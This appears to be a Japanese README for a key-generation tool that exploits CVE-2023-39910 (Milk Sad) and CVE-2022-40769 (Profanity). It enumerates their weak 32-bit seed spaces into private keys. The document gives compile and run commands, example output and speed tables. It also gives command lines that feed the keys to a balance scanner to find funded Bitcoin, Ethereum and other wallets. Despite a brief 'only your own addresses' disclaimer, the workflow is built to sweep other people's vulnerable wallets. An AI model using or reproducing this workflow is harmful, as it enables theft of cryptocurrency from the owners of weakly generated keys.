
DONATE: bc1qps62cyk9f9unmdkc9k3ccj9e2h8ywfhg2j53ec
Built with ❤️ for the crypto research community.
説明: このツールは、暗号通貨ウォレットに影響を与えた2つの重大な脆弱性から秘密鍵を生成します。64文字の16進数秘密鍵(256ビット)を含むTXTファイルを作成し、AllChainScannerに投入してアドレス生成と残高確認を行います。
🔴 2つの主要な暗号脆弱性から鍵を生成!
CVE-2023-39910 (Libbitcoin Explorer / Milk Sad)
CVE-2022-40769 (Profanity - Ethereumバニティアドレス生成ツール)
ステップ1: 鍵を生成 ./keygen 0 1000000 keys.txt
ステップ2: 出力ファイルの作成
ステップ3: AllChainScannerに投入 ./AllChainScanner -f libbitcoin_keys.txt -o found.txt -t all ./AllChainScanner -f profanity_keys.txt -o found.txt -t all
ステップ4: スキャナーが64文字の16進数を変換:
コンパイル: g++ -O3 -march=native -o keygen keygen.cpp -std=c++17
使い方: ./keygen [start_seed] [end_seed] [output.txt]
パラメータ: start_seed 開始シード(デフォルト: 0) end_seed 終了シード(デフォルト: 1000000) output.txt 出力ファイル名(デフォルト: keys.txt)
例: ./keygen 0 1000000 keys.txt → 1,000,000個の鍵を生成(0~999,999)
./keygen 1000000 2000000 keys.txt → 1,000,000個の鍵を生成(1,000,000~1,999,999)
./keygen 0 10000000 keys.txt → 10,000,000個の鍵を生成(約1~2分)
ファイル: libbitcoin_.txt
ファイル: profanity_.txt
リンク: https://github.com/ethicbrudhack/AllChainScanner-Bitcoin-eth-zcash-etc..-
鍵を生成: ./keygen 0 10000000 keys.txt
Bitcoin鍵をスキャン: ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t P2PKH ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t P2SH ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t bech32
Ethereum鍵をスキャン: ./AllChainScanner -f profanity_keys.txt -o eth_found.txt -t ethereum
全コインをスキャン: ./AllChainScanner -f libbitcoin_keys.txt -o all_found.txt -t HEX
生成されたすべての鍵は以下で動作します: ✅ Bitcoin(1..., 3..., bc1...) ✅ Ethereum(0x...) ✅ Litecoin(L..., M...) ✅ Dogecoin(D...) ✅ Dash(X...) ✅ Zcash(t1..., t3...) ✅ Bitcoin Cash(bitcoincash:...) ✅ BNB Smart Chain(0x...) ✅ Polygon(0x...) ✅ Avalanche C-Chain(0x...)
CVE-2023-39910(Milk Sad):
CVE-2022-40769(Profanity):
*以下に基づく:
実行: ./keygen 0 5 keys.txt
範囲: 0 - 5 鍵の数: 5 出力ファイル: keys.txt
[1] CVE-2023-39910(Libbitcoin/Milk Sad)- 生成中... 5/5 | 2500000 keys/s 保存: libbitcoin_keys.txt(0.0秒)
[2] CVE-2022-40769(Profanity)- 生成中... 5/5 | 2500000 keys/s 保存: profanity_keys.txt(0.0秒)
必ず両方の生成器を使用する
広い範囲を生成する
他のスキャナーと組み合わせる
found.txtを安全に保管
⚠️ このツールは実際の秘密鍵を生成します! ⚠️ 自分が所有するアドレスでのみテストしてください! ⚠️ 違法行為に使用しないでください! ⚠️ found.txtを安全に保管してください - 秘密鍵が含まれています!
このツールによって生成された鍵は:
CVE-2023-39910: https://nvd.nist.gov/vuln/detail/CVE-2023-39910 CVE-2022-40769: https://nvd.nist.gov/vuln/detail/CVE-2022-40769 Milk Sad: https://milksad.info Profanity: https://github.com/1r0n1c/profanity AllChainScanner: https://github.com/ethicbrudhack/AllChainScanner-Bitcoin-eth-zcash-etc..-
MITライセンス - 教育および研究目的のみ
| 生成器 | 速度(鍵/秒) | 100万鍵の時間 | 1000万鍵の時間 |
|---|
| CVE-2023-39910 | ~2,000,000 | ~0.5秒 | ~5秒 |
| CVE-2022-40769 | ~2,000,000 | ~0.5秒 | ~5秒 |
| 合計 | ~1,000,000 | ~1秒 | ~10秒 |
| 脆弱性 | エントロピー | 可能性の数 | 総当たり時間* |
|---|
| CVE-2023-39910 | 32ビット | 4.29 × 10^9 | ~8秒(24ワード) |
| CVE-2023-39910 | 32ビット | 4.29 × 10^9 | ~12分(BIP32) |
| CVE-2022-40769 | 32ビット | 4.29 × 10^9 | ~8秒(24ワード) |
| CVE-2022-40769 | 32ビット | 4.29 × 10^9 | ~12分(BIP32) |
| 実際の256ビット | 256ビット | 1.16 × 10^77 | 不可能 |